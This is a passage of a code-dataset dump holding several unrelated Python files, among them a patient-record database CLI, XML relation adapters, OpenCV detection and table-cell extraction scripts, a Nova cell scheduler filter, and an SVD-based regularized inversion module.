No Abbreviations): \")\n            creation = input(\"Folder Creation Date (i.e YYYY-MM-DD HH:MI   ): \")\n            values = (name, birthday, dis_ill, creation)\n            cursor.execute(\"INSERT INTO patients VALUES(?,?,?,?)\", values)\n            connection.commit()\n        except ValueError:\n            print(\"Invalid data!\")\n    elif choice == \"3\":\n        # Update existing patient folder\n        try:\n            name = get_name(cursor)\n            \n            if name is None:\n                continue\n            \n            name = input(\"Name: \")\n            birthday = input(\"Birth Date (i.e. YYYY-MM-DD       ): \")\n            dis_ill = input(\"Disability/Illness (i.e. No Abbreviations): \")\n            values = (dis_ill, birthday, name ) # Make sure order is correct\n            cursor.execute(\"UPDATE patients SET illness = ?, birthday = ? WHERE name = ?\", values)\n            connection.commit()\n            # Display updated patient folder\n            # cursor.execute(\"SELECT * FROM patients ORDER BY creation DESC \")\n            # print(\"{:>20} {:>10} {:>40} {:>40}\".format(\"Name/Middle/Last\", \"Birthday\", \"Disability/Illness\", \"Folder Date Creation\"))\n\n            # for record in cursor.fetchall():\n            #     print(\"{:>20} {:>10} {:>40} {:>40}\".format(record[0], record[1], record[2], record[3]))\n            \n            if cursor.rowcount == 0:\n                print(\"Invalid Name!\")\n        except ValueError:\n            print(\"Invalid data!\")\n    elif choice == \"4\":\n        # Delete Patient\n        name = get_name(cursor)\n        \n        if name is None:\n            continue\n        values = (name, )\n        cursor.execute(\"DELETE FROM patients WHERE name = ?\", values)\n        connection.commit()\n    print()\n    # Continue improving project.\n\n# Close the database connection before exiting\nconnection.close()","repo_name":"thunderbioink/MediLOG_SPRINT_1","sub_path":"MediLOG.py","file_name":"MediLOG.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4641674668","text":"from lxml import etree\nfrom z3c.schema2xml import IXMLGenerator\nfrom zope.component import adapter\nfrom zope.interface import implementer\n\nfrom z3c.relationfield.interfaces import IRelation\nfrom z3c.relationfield.interfaces import IRelationList\nfrom z3c.relationfield.relation import TemporaryRelationValue\n\n\n@adapter(IRelationList)\n@implementer(IXMLGenerator)\nclass RelationListGenerator:\n    \"\"\"Export a relation list to XML.\n    \"\"\"\n\n    def __init__(self, context):\n        self.context = context\n\n    def output(self, container, value):\n        element = etree.SubElement(container, self.context.__name__)\n        field = self.context.value_type\n        if value is not None:\n            for v in value:\n                IXMLGenerator(field).output(element, v)\n\n    def input(self, element):\n        field = self.context.value_type\n        return [\n            IXMLGenerator(field).input(sub_element)\n            for sub_element in element]\n\n\n@adapter(IRelation)\n@implementer(IXMLGenerator)\nclass RelationGenerator:\n    \"\"\"Export a relation to XML.\n    \"\"\"\n\n    def __init__(self, context):\n        self.context = context\n\n    def output(self, container, value):\n        element = etree.SubElement(container, self.context.__name__)\n        if value is not None:\n            element.text = value.to_path\n\n    def input(self, element):\n        if element.text is None:\n            return None\n        path = element.text\n        return TemporaryRelationValue(path)\n
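\n# Round-trip sketch (editor's note): output() serializes a relation simply as its\n# to_path text inside an element named after the field; input() rebuilds a\n# TemporaryRelationValue from that path, to be resolved to a real relation later.\n","repo_name":"zopefoundation/z3c.relationfield","sub_path":"src/z3c/relationfield/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18964127748","text":"import cv2\nimport pickle\nimport numpy as np\nfrom flag import Flag\n\nflag = Flag()\nwith open('assets/colors.h5', 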
'rb') as f:\n    colors = pickle.loads(f.read())\n\nwith open('label.txt', 'r') as f:\n    classes = f.readlines()\n\n\ndef detector(image, label):\n    image = np.asarray(image * 255., np.uint8)\n    image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    indices = np.squeeze(np.max(np.max(label, axis=0, keepdims=True), axis=1, keepdims=True))\n    indices = np.where(indices > 0.5)[0]\n\n    for i in indices:\n        output = np.asarray(label[:, :, i], dtype=float)\n        output[output > flag.threshold] = 255.\n        output[output <= flag.threshold] = 0.\n        output = np.asarray(output, dtype=np.uint8)\n        kernel = np.ones((2, 2), np.float32) / 4\n        output = cv2.filter2D(output, -1, kernel)\n        # cv2.imshow('out', cv2.resize(output, (256, 256)))\n        # cv2.waitKey(0)\n        _, contours, _ = cv2.findContours(output, cv2.RETR_LIST, cv2.CHAIN_APPROX_TC89_L1)\n\n        for contour in contours:\n            # print(contour)\n            col_wise = contour[:, :, 0]\n            row_wise = contour[:, :, 1]\n\n            x1 = min(col_wise)[0] / flag.y_size * flag.x_size\n            y1 = min(row_wise)[0] / flag.y_size * flag.x_size\n            x2 = max(col_wise)[0] / flag.y_size * flag.x_size\n            y2 = max(row_wise)[0] / flag.y_size * flag.x_size\n            # print(x1, y1, x2, y2)\n            c = colors[i]\n            image = cv2.rectangle(image, (int(x1), int(y1)), (int(x2), int(y2)), (int(c[0]), int(c[1]), int(c[2])), 2)\n            # print('class =', classes[i-1])\n            font = cv2.FONT_HERSHEY_SIMPLEX\n            cv2.putText(image, classes[i - 1][:-1], (int(x1), int(y1)), font, .8, (int(c[0]), int(c[1]), int(c[2])), 2,\n                        cv2.LINE_AA)\n\n    return image\n\n\nif __name__ == '__main__':\n    flag = Flag()\n    images = np.load('dataset/valid_x.npy')\n    labels = np.load('dataset/valid_y.npy')\n    # print(images.shape)\n    image = images[100]\n    label = labels[100]\n    image = detector(image, label)\n    cv2.imshow('image', image)\n    cv2.waitKey(0)\n","repo_name":"MahmudulAlam/Object-Detection-Using-GPM","sub_path":"detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36337559865","text":"import numpy as np\nimport cv2\nfrom .show_image import show_image\nfrom .global_variables import *\n\ndef attempt_image_improvement(cell):\n    cell = cv2.GaussianBlur(cell,(7,7),0)\n    cell = cv2.addWeighted(cell, 2.4, np.zeros(cell.shape, cell.dtype), 0, -180) #2,-120\n    kernel = np.array([[-1,-1,-1],\n                       [-1, 9,-1],\n                       [-1,-1,-1]])\n    cell = cv2.filter2D(cell, -1, kernel)\n    return cell\n\ndef get_cells(img, linesv, linesh):\n    pointsv = []\n    for line in linesv:\n        [x1, y1, x2, y2] = line[0]\n        pointsv.append(x1)\n    pointsv.sort()\n\n    pointsh = []\n    for line in linesh:\n        [x1, y1, x2, y2] = line[0]\n        pointsh.append(y1)\n    pointsh.sort()\n\n    cells = []\n    for i in range(len(pointsh)):\n        row = []\n        if i == len(pointsh) - 1:\n            continue\n        for x in range(len(pointsv)):\n            if x == len(pointsv) - 1:\n                continue\n            cell = img[pointsh[i] + FROM_LINE_OFFSET:pointsh[i + 1] +\n                       FROM_LINE_OFFSET, pointsv[x]:pointsv[x + 1]].copy()\n            if ATTEMPT_IMAGE_IMPROVEMENT:\n                cell = attempt_image_improvement(cell)\n            #show_image(cell, \"Particular cell\")\n            row.append(cell)\n        cells.append(row)\n    return cells\n\n\ndef find_correct_line(p1, p2, lines):\n    if p2 < p1:\n        raise ValueError('weird formatting: expected p1 <= p2')\n\n    # If the line goes less than a third into the cell it cannot be considered a valid line.\n    allowed_offset = abs(p1 - p2) / 3\n    for line in lines:\n        [x1, y1, x2, y2] = line\n        if (y1 < (p1 + allowed_offset) and y2 < (p1 + allowed_offset)) or (y1 > (p2 - allowed_offset) and y2 > (p2 - allowed_offset)):\n            continue\n        else:\n            return line\n    print(\"Found no correct lines!\")\n    print(p1, p2, lines)\n\n\ndef get_cells_irreg(img, linesv, linesh):\n    linesv = sorted(linesv, key=lambda x: x[0][0])\n    linesh = sorted(linesh, key=lambda x: x[0][1])\n\n    cells = []\n    for i in range(len(linesh)):\n        row = []\n        if i == len(linesh) - 1:\n            continue\n        [_, iy1, _, _] = linesh[i][0]\n        [_, iyy1, _, _] = linesh[i + 1][0]\n        for z in range(len(linesv)):\n            if z == len(linesv) - 1:\n                continue\n            # First line\n            line = find_correct_line(iy1, iyy1, linesv[z])\n            if line is None:\n                continue\n            else:\n                [zx1, _, _, _] = line\n            # Second line\n            # If the first line isn't valid keep looking\n            for iteration in range(len(linesv)):\n                line = find_correct_line(iy1, iyy1, linesv[z + iteration + 1])\n                if line is None:\n                    continue\n                else:\n                    [zxx1, _, _, _] = line\n                    break\n\n            cell = img[iy1 + FROM_LINE_OFFSET:iyy1 +\n                       FROM_LINE_OFFSET, zx1:zxx1].copy()\n            if ATTEMPT_IMAGE_IMPROVEMENT:\n                cell = attempt_image_improvement(cell)\n            #show_image(cell, \"Particular cell\")\n            row.append(cell)\n        cells.append(row)\n    return cells\n","repo_name":"AlexanderBergkvist/ExcelReader","sub_path":"libs/get_cells.py","file_name":"get_cells.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25023734657","text":"import os\nimport openai\n\nopenai.api_key = os.getenv(\"OPENAI-KEY\")\n\nuser_prompt = \"city during the night\"\n\nresponse = openai.Image.create(\n    prompt = user_prompt, \n    n = 1, \n    size = \"1024x1024\"\n) \n\nimage_url = response['data'][0][\"url\"]\n\nprint(image_url)\n","repo_name":"shriya1111/evadb_project_image_generation","sub_path":"image_generate.py","file_name":"image_generate.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"689179592","text":"from nova.cells import filters\nfrom nova.cells import utils as cells_utils\nfrom nova import db\nfrom nova import exception\nfrom nova.openstack.common import log as logging\n\nLOG = logging.getLogger(__name__)\n\n\n
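# Hints arrive through the request's scheduler_hints, e.g. (illustrative uuid):\n#     {'near': 'aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee'}\n# which this filter translates into a same_cell / different_cell constraint below.\nclass RAXNearFarCellFilter(filters.BaseCellFilter):\n    \"\"\"Rackspace near/far instance filter.\n    Check for 'near' or 'far' in the scheduler_hints dict. 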
Values\n are instance_uuids.\n\n 'near' an instance_uuid needs to target the build for the same\n cell as instance_uuid.\n\n 'far' means to target the build for a different cell than\n instance_uuid.\n \"\"\"\n\n @staticmethod\n def _get_cell_name(context, instance_uuid, filter_type):\n try:\n instance = db.instance_get_by_uuid(context,\n instance_uuid)\n except exception.InstanceNotFound:\n reason = _(\"Instance '%(instance_uuid)s' not found for \"\n \"'%(filter_type)s' scheduler_hint\") % locals()\n raise exception.CellsFilterError(reason=reason)\n cell_name = instance['cell_name']\n if not cell_name:\n reason = _(\"Instance '%(instance_uuid)s' is not assigned to a \"\n \"cell for '%(filter_type)s' scheduler_hint\") % locals()\n raise exception.CellsFilterError(reason=reason)\n return cell_name\n\n @staticmethod\n def _find_cell(cell_name, cells_manager, routing_path):\n try:\n (next_hop_name, host) = cells_utils.cell_name_for_next_hop(\n cell_name, routing_path)\n except exception.CellRoutingInconsistency:\n return None\n if not next_hop_name:\n return cells_manager.my_cell_info\n return cells_manager.child_cells.get(next_hop_name)\n\n def filter_cells(self, cells, filter_properties):\n context = filter_properties['context']\n scheduler_hints = filter_properties.get('scheduler_hints')\n if not scheduler_hints:\n return\n routing_path = filter_properties['routing_path']\n cells_manager = filter_properties['scheduler'].manager\n\n # First, we need to turn 'near' and 'far' into 'same_cell'\n # and 'different_cell' hints. When we're routing down,\n # we may have some routing-only hops, so they will not be\n # able to look up instances.\n near_uuid = scheduler_hints.pop('near', None)\n if near_uuid:\n cell_name = self._get_cell_name(context, near_uuid, 'near')\n scheduler_hints['same_cell'] = cell_name\n far_uuid = scheduler_hints.pop('far', None)\n if far_uuid:\n cell_name = self._get_cell_name(context, far_uuid, 'far')\n scheduler_hints['different_cell'] = cell_name\n cell = self._find_cell(cell_name,\n cells_manager, routing_path)\n if cell:\n # We should also try to filter DCZONE if we have it.\n dczone = cell.capabilities.get('DCZONE')\n if dczone:\n scheduler_hints['different_dczone'] = dczone[0]\n\n # Now we can look at 'same_cell', 'different_cell', and\n # 'different_dczone'\n same_cell = scheduler_hints.get('same_cell')\n if same_cell:\n LOG.info(_(\"Forcing direct route to %(same_cell)s because \"\n \"of 'same_cell' scheduler hint\"), locals())\n return {'action': 'direct_route',\n 'target': same_cell}\n different_cell = scheduler_hints.get('different_cell')\n if different_cell:\n hops_left = (different_cell.count(\n cells_utils.PATH_CELL_SEP) - routing_path.count(\n cells_utils.PATH_CELL_SEP))\n cell = self._find_cell(different_cell,\n cells_manager, routing_path)\n # If there's only 1 hop left, we need to remove\n # this cell.. otherwise it's okay to include it,\n # because the next cell down can filter.\n #\n # Also, if we're the cell, remove ourselves from\n # the set. 
This should be the case if hops_left == 0\n if cell and hops_left <= 1:\n try:\n cell_name = cell.name\n LOG.info(_(\"Removing cell %(cell)s because \"\n \"of 'different_cell' scheduler_hint of \"\n \"'%(different_cell)s'\"), locals())\n cells.remove(cell)\n except KeyError:\n pass\n if not cells:\n return\n\n different_dczone = scheduler_hints.get('different_dczone')\n if different_dczone:\n matching_dczone_cells = [cell for cell in cells\n if cell.capabilities.get('DCZONE', [None])[0] ==\n different_dczone]\n # Remove cells that match the DCZONE\n if matching_dczone_cells:\n LOG.info(_(\"Removing cells %(matching_dczone_cells)s \"\n \"because of 'different_dczone' scheduler_hint \"\n \"of %(different_dczone)s\"), locals())\n return {'drop': matching_dczone_cells}\n","repo_name":"sridevikoushik31/nova","sub_path":"nova/cells/filters/rax_near_far.py","file_name":"rax_near_far.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17007063973","text":"\"\"\"Module to offer the Core functionalities for the ill-posed inversion calculation.\n\nThis module includes the usefull functions or base classes for the ill-posed inversion calculation\nbased on Singular Value Decomposition (SVD) method.\n\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Callable\n\nfrom numpy import arange, asarray, floating, ndarray, ones_like, sqrt\nfrom numpy.linalg import norm\nfrom scipy.optimize import basinhopping\nfrom scipy.sparse import csc_matrix as sp_csc_matrix\nfrom scipy.sparse import csr_matrix as sp_csr_matrix\nfrom scipy.sparse import issparse\nfrom sksparse.cholmod import cholesky\n\nfrom .tools.spinner import DummySpinner, Spinner\n\n__all__ = [\"_SVDBase\", \"compute_svd\"]\n\n\nclass _SVDBase:\n \"\"\"Base class for inversion calculation based on Singular Value Decomposition (SVD) method.\n\n .. note::\n\n This class is designed to be inherited by subclasses which define the objective function\n to optimize the regularization parameter :math:`\\\\lambda` using the\n :obj:`~scipy.optimize.basinhopping` function.\n\n\n Parameters\n ----------\n s : vector_like\n singular values of :math:`A`\n like :math:`\\\\sigma = (\\\\sigma_1, \\\\sigma_2, ...) \\\\in \\\\mathbb{R}^r`\n u : array_like\n left singular vectors of :math:`A`\n like :math:`U = (u_1, u_2, ...) \\\\in \\\\mathbb{R}^{m\\\\times r}`\n basis : array_like\n inverted solution basis :math:`\\\\tilde{V} \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n Here, :math:`\\\\tilde{V} = L^{-1}V`, where :math:`V\\\\in\\\\mathbb{R}^{n\\\\times r}` is\n the right singular vectors of :math:`A` and :math:`L^{-1}` is the inverse of\n regularization operator :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n data : vector_like\n given data for inversion calculation forms as a vector in :math:`\\\\mathbb{R}^m`\n\n Notes\n -----\n This class offers the calculation of the inverted solution defined by\n\n .. math::\n\n Ax = b,\n\n where :math:`A` is a matrix in :math:`\\\\mathbb{R}^{m\\\\times n}`, :math:`x` is a solution vector\n in :math:`\\\\mathbb{R}^n` and :math:`b` is a given data vector in :math:`\\\\mathbb{R}^m`.\n\n The solution is usually calculated by the least square method, which is defined by\n\n .. 
math::\n\n x_\\\\text{ls} :&= \\\\text{argmin} \\\\{ ||Ax-b||^2 \\\\} \\\\\n\n &= ( A^\\\\mathsf{T} A )^{-1} A^\\\\mathsf{T} b.\n\n This problem is often ill-posed, so the solution is estimated by adding the regularization term\n like :math:`||Lx||^2` to the right hand side of the equation:\n\n .. math::\n\n x_\\\\lambda :&= \\\\text{argmin} \\\\{ ||Ax-b||^2 + \\\\lambda ||Lx||^2 \\\\} \\\\\n\n &= (A^\\\\mathsf{T} A + \\\\lambda L^\\\\mathsf{T} L)^{-1} A^\\\\mathsf{T}\\\\ b,\n\n where :math:`\\\\lambda\\\\in\\\\mathbb{R}` is the reguralization parameter and\n :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}` is a matrix operator in regularization term\n (e.g. laplacian).\n\n The SVD components are based on the following equation:\n\n .. math::\n\n U\\\\Sigma V^\\\\mathsf{T}\n = \\\\begin{pmatrix}\n u_1 & \\\\cdots & u_r\n \\\\end{pmatrix}\n \\\\ \\\\text{diag}(\\\\sigma_1,..., \\\\sigma_r)\n \\\\ \\\\begin{pmatrix}\n v_1 & \\\\cdots & v_r\n \\\\end{pmatrix}^\\\\mathsf{T}\n = AL^{-1}\n\n Using this components allows to reconstruct the estimated solution :math:`x_\\\\lambda` as follows:\n\n .. math::\n\n x_\\\\lambda &= \\\\tilde{V}W\\\\Sigma^{-1}U^\\\\mathsf{T}b \\\\\\\\\n &= \\\\begin{pmatrix} \\\\tilde{v}_1 & \\\\cdots & \\\\tilde{v}_r \\\\end{pmatrix}\n \\\\ \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))\n \\\\ \\\\text{diag}(\\\\sigma_1^{-1}, ..., \\\\sigma_r^{-1})\n \\\\begin{pmatrix}\n u_1^\\\\mathsf{T}b \\\\\\\\\n \\\\vdots \\\\\\\\\n u_r^\\\\mathsf{T}b\n \\\\end{pmatrix} \\\\\\\\\n &= \\\\sum_{i=0}^{r} w_i(\\\\lambda)\\\\frac{u_i^\\\\mathsf{T} b}{\\\\sigma_i} \\\\tilde{v}_i,\n\n where :math:`r` is the rank of :math:`A` (:math:`r \\\\leq \\\\min(m, n)`), :math:`w_i` is\n the window function, :math:`\\\\sigma_i` is the singular value of :math:`A` and\n :math:`\\\\tilde{v}_i` is a :math:`i`-th column vector of the inverted solution basis:\n :math:`\\\\tilde{V} = L^{-1}V \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n\n :math:`w_i` is defined as follows:\n\n .. 
math::\n\n w_i(\\\\lambda) \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma_i^2}.\n \"\"\"\n\n def __init__(self, s, u, basis, data=None):\n # validate SVD components\n s = asarray(s, dtype=float)\n if s.ndim != 1:\n raise ValueError(\"s must be a vector.\")\n\n u = asarray(u, dtype=float)\n if u.ndim != 2:\n raise ValueError(\"u must be a matrix.\")\n if s.size != u.shape[1]:\n raise ValueError(\"the number of columns of u must be same as that of singular values\")\n\n # set SVD components\n self._s = s\n self._u = u\n\n # set inverted solution basis\n self.basis = basis\n\n # set data values\n if data is not None:\n self.data = data\n else:\n self._data = None\n\n # set initial regularization parameter\n self._beta = 0.0\n\n # set initial optimal regularization parameter\n self._lambda_opt: float | None = None\n\n def __repr__(self):\n return (\n f\"{self.__class__.__name__}\"\n f\"(s:{self._s.shape}, u:{self._u.shape}, basis:{self._basis.shape})\"\n )\n\n def __getstate__(self):\n \"\"\"Return the state of the _SVDBase object.\"\"\"\n state = self.__dict__.copy()\n return state\n\n def __setstate__(self, state):\n \"\"\"Set the state of the _SVDBase object.\"\"\"\n self.__dict__.update(state)\n\n def __reduce__(self):\n return self.__new__, (self.__class__,), self.__getstate__()\n\n @property\n def s(self) -> ndarray:\n \"\"\"Singular values of :math:`A`\n\n Singular values form a vector array like\n :math:`\\\\sigma = (\\\\sigma_1, \\\\sigma_2,...)\\\\in\\\\mathbb{R}^r`\n \"\"\"\n return self._s\n\n @property\n def u(self) -> ndarray:\n \"\"\"Left singular vectors of :math:`A`.\n\n Left singular vactors form a matrix containing column vectors like\n :math:`U = (u_1, u_2,...)\\\\in\\\\mathbb{R}^{m\\\\times r}`\n \"\"\"\n return self._u\n\n @property\n def basis(self) -> ndarray:\n \"\"\"The inverted solution basis :math:`\\\\tilde{V} \\\\in \\\\mathbb{R}^{n\\\\times r}`.\n\n If the regularization term is described as :math:`||Lx||^2`, then\n :math:`\\\\tilde{V} = L^{-1}V \\\\in \\\\mathbb{R}^{n\\\\times r}`,\n where :math:`V\\\\in\\\\mathbb{R}^{n\\\\times r}` is the right singular vectors of :math:`A` and\n :math:`L^{-1}` is the inverse of regularization operator\n :math:`L \\\\in \\\\mathbb{R}^{n\\\\times n}`.\n \"\"\"\n return self._basis\n\n @basis.setter\n def basis(self, mat):\n if not isinstance(mat, ndarray):\n raise TypeError(\"basis must be a numpy.ndarray\")\n if mat.shape[1] != self._s.size:\n raise ValueError(\n \"the number of columns of inverted solution basis must be same as that of singular values\"\n )\n self._basis = mat\n\n @property\n def data(self) -> ndarray:\n \"\"\"Given data for inversion calculation.\"\"\"\n return self._data\n\n @data.setter\n def data(self, value):\n data = asarray(value, dtype=float)\n if data.ndim != 1:\n raise ValueError(\"data must be a vector.\")\n if data.size != self._u.shape[0]:\n raise ValueError(\"data size must be the same as the number of rows of U matrix\")\n self._data = data\n self._ub = self._u.T @ data # U^T b\n\n # -------------------------------------------------------------------------\n # Define methods calculating some norms, window function, etc...\n # -------------------------------------------------------------------------\n\n def w(self, beta: float) -> ndarray:\n \"\"\"Calculate window function using regularization parameter :math:`\\\\lambda`.\n\n The window function is defined as follows:\n\n .. 
math::\n\n w(\\\\lambda) \\\\equiv \\\\frac{1}{1 + \\\\lambda / \\\\sigma^2},\n\n where :math:`\\\\sigma` is the singular value of :math:`A`.\n Because :math:`\\\\sigma` is a vector, the window function is also a vector.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.ndarray (N, )\n vector of window function\n \"\"\"\n return 1.0 / (1.0 + beta / self._s**2.0)\n\n def rho(self, beta: float) -> floating:\n \"\"\"Calculate squared residual norm: :math:`\\\\rho = ||Ax_\\\\lambda - b||^2`.\n\n :math:`\\\\rho` can be calculated with SVD components as follows:\n\n .. math::\n\n \\\\rho &= \\\\left\\\\|\n U (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n \\\\begin{pmatrix} u_1 & \\\\cdots & u_r \\\\end{pmatrix}\n (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n (I_r - W) U^\\\\mathsf{T} b\n \\\\right\\\\|^2\n \\\\quad(\n \\\\because U^\\\\mathsf{T}U = I_r,\n \\\\quad\\\\text{i.e.}\\\\quad u_i\\\\cdot u_j = \\\\delta_{ij}\n ),\n\n where :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))`\n and :math:`w_i(\\\\lambda)` is the window function.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n squared residual norm\n \"\"\"\n return norm((1.0 - self.w(beta)) * self._ub) ** 2.0\n\n def eta(self, beta: float) -> floating:\n \"\"\"Calculate squared regularization norm: :math:`\\\\eta = ||Lx_\\\\lambda||^2`\n\n :math:`\\\\eta` can be calculated with SVD components as follows:\n\n .. math::\n\n \\\\eta &= \\\\left\\\\|\n V W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n \\\\begin{pmatrix} v_1 & \\\\cdots & v_r \\\\end{pmatrix}\n W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\\\\\\\\\n &= \\\\left\\\\|\n W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2\n \\\\quad(\n \\\\because V^\\\\mathsf{T}V = I_r,\n \\\\quad\\\\text{i.e.}\\\\quad v_i\\\\cdot v_j = \\\\delta_{ij}\n ),\n\n where :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))`\n and :math:`w_i(\\\\lambda)` is the window function.\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n squared regularization norm\n \"\"\"\n return norm((self.w(beta) / self._s) * self._ub) ** 2.0\n\n def eta_diff(self, beta: float) -> floating:\n \"\"\"Calculate differential of `eta`: :math:`\\\\eta' = \\\\frac{d\\\\eta}{d\\\\lambda}`\n\n Before calculating :math:`\\\\eta'`, let us calculate the differential of window function\n matrix :math:`W = \\\\text{diag}(w_1(\\\\lambda), ..., w_r(\\\\lambda))` using SVD components:\n\n .. math::\n\n \\\\frac{dW}{d\\\\lambda}\n &= \\\\frac{d}{d\\\\lambda}\n \\\\text{diag}\\\\left(..., \\\\frac{1}{1 + \\\\lambda/\\\\sigma_i^2}, ...\\\\right)\n \\\\quad \\\\left(\\\\because w_i(\\\\lambda) = \\\\frac{1}{1 + \\\\lambda/\\\\sigma_i^2} \\\\right)\\\\\\\\\n &= \\\\text{diag}\\\\left(\n ..., -\\\\frac{\\\\sigma_i^{-2}}{(1 + \\\\lambda/\\\\sigma_i^2)^2}, ...\n \\\\right)\\\\\\\\\n &= - W^2 \\\\Sigma^{-2}\\\\\\\\\n &= - \\\\frac{1}{\\\\lambda} W (I_r - W). \\\\quad(\\\\because I_r - W = \\\\lambda W \\\\Sigma^{-2})\n\n Therefore :math:`\\\\eta'` can be calculated as follows:\n\n .. 
math::\n\n \\\\eta' &= \\\\frac{d}{d\\\\lambda} \\\\left\\\\|W\\\\Sigma^{^-1}U^\\\\mathsf{T}b\\\\right\\\\|\\\\\\\\\n &= a^\\\\mathsf{T}\\\\left(\\\\frac{d}{d\\\\lambda} W^2 \\\\right) a\n \\\\quad(\\\\because a\\\\equiv\\\\Sigma^{-1}U^\\\\mathsf{T}b, \\\\ W^2 = W^\\\\mathsf{T}W)\\\\\\\\\n &= 2a^\\\\mathsf{T}W\\\\frac{dW}{d\\\\lambda}a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^2 (I_r - W) a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^\\\\mathsf{T} (I_r - W)^{\\\\mathsf{T}/2}\n (I_r - W)^{1/2} W a\\\\\\\\\n &= -\\\\frac{2}{\\\\lambda}\n \\\\left\\\\|\n \\\\sqrt{I_r - W}\\\\ W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n \\\\right\\\\|^2.\n\n\n Parameters\n ----------\n beta\n regularization parameter\n\n Returns\n -------\n numpy.floating\n differential of squared regularization norm\n \"\"\"\n w = self.w(beta)\n return (-2.0 / beta) * norm(sqrt(1.0 - w) * (w / self._s) * self._ub) ** 2.0\n\n def residual_norm(self, beta: float) -> ndarray:\n \"\"\"Return the residual norm: :math:`\\\\sqrt{\\\\rho} = ||Ax_\\\\lambda - b||`\n\n Parameters\n ----------\n beta\n reguralization parameter\n\n Returns\n -------\n float\n residual norm\n \"\"\"\n return sqrt(self.rho(beta))\n\n def regularization_norm(self, beta: float) -> float:\n \"\"\"Return the residual norm: :math:`\\\\sqrt{\\\\eta} = ||L x_\\\\lambda||`\n\n Parameters\n ----------\n beta\n reguralization parameter\n\n Returns\n -------\n float\n regularization norm\n \"\"\"\n return sqrt(self.eta(beta))\n\n # ------------------------------------------------------\n # calculating the inverted solution using SVD components\n # ------------------------------------------------------\n\n def inverted_solution(self, beta: float) -> ndarray:\n \"\"\"Calculate the inverted solution using SVD components at given regularization parameter.\n\n The solution is calculated as follows:\n\n .. 
math::\n\n            \\\\eta' &= \\\\frac{d}{d\\\\lambda} \\\\left\\\\|W\\\\Sigma^{-1}U^\\\\mathsf{T}b\\\\right\\\\|^2\\\\\\\\\n            &= a^\\\\mathsf{T}\\\\left(\\\\frac{d}{d\\\\lambda} W^2 \\\\right) a\n            \\\\quad(\\\\because a\\\\equiv\\\\Sigma^{-1}U^\\\\mathsf{T}b, \\\\ W^2 = W^\\\\mathsf{T}W)\\\\\\\\\n            &= 2a^\\\\mathsf{T}W\\\\frac{dW}{d\\\\lambda}a\\\\\\\\\n            &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^2 (I_r - W) a\\\\\\\\\n            &= -\\\\frac{2}{\\\\lambda} a^\\\\mathsf{T} W^\\\\mathsf{T} (I_r - W)^{\\\\mathsf{T}/2}\n            (I_r - W)^{1/2} W a\\\\\\\\\n            &= -\\\\frac{2}{\\\\lambda}\n            \\\\left\\\\|\n            \\\\sqrt{I_r - W}\\\\ W \\\\Sigma^{-1} U^\\\\mathsf{T} b\n            \\\\right\\\\|^2.\n\n\n        Parameters\n        ----------\n        beta\n            regularization parameter\n\n        Returns\n        -------\n        numpy.floating\n            differential of squared regularization norm\n        \"\"\"\n        w = self.w(beta)\n        return (-2.0 / beta) * norm(sqrt(1.0 - w) * (w / self._s) * self._ub) ** 2.0\n\n    def residual_norm(self, beta: float) -> float:\n        \"\"\"Return the residual norm: :math:`\\\\sqrt{\\\\rho} = ||Ax_\\\\lambda - b||`\n\n        Parameters\n        ----------\n        beta\n            regularization parameter\n\n        Returns\n        -------\n        float\n            residual norm\n        \"\"\"\n        return sqrt(self.rho(beta))\n\n    def regularization_norm(self, beta: float) -> float:\n        \"\"\"Return the regularization norm: :math:`\\\\sqrt{\\\\eta} = ||L x_\\\\lambda||`\n\n        Parameters\n        ----------\n        beta\n            regularization parameter\n\n        Returns\n        -------\n        float\n            regularization norm\n        \"\"\"\n        return sqrt(self.eta(beta))\n\n    # ------------------------------------------------------\n    # calculating the inverted solution using SVD components\n    # ------------------------------------------------------\n\n    def inverted_solution(self, beta: float) -> ndarray:\n        \"\"\"Calculate the inverted solution using SVD components at given regularization parameter.\n\n        The solution is calculated as follows:\n\n        .. 
